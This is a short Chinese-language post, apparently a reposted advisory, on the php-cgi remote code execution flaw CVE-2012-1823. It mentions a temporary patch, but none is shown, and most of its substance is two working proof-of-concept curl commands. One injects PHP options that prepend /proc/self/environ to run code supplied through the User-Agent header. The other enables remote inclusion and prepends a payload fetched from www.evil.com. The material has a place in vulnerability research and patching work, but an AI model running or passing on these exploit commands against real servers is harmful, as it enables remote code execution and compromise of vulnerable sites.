CVE-2012-1823 php-cgi远程代码执行

CVE-2012-1823,php-cgi远程代码执行,FastCGI不受影响。PHP官方暂时未发布补丁,请受影响的站长按文章下方提供的方式打好临时补丁。

http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

via:knownsec

POC:

1、本地包含直接执行代码:

curl -H "USER-AGENT: " http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n

2、远程包含执行代码:

curl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt

via/Gary

你可能感兴趣的:(CVE-2012-1823 php-cgi远程代码执行)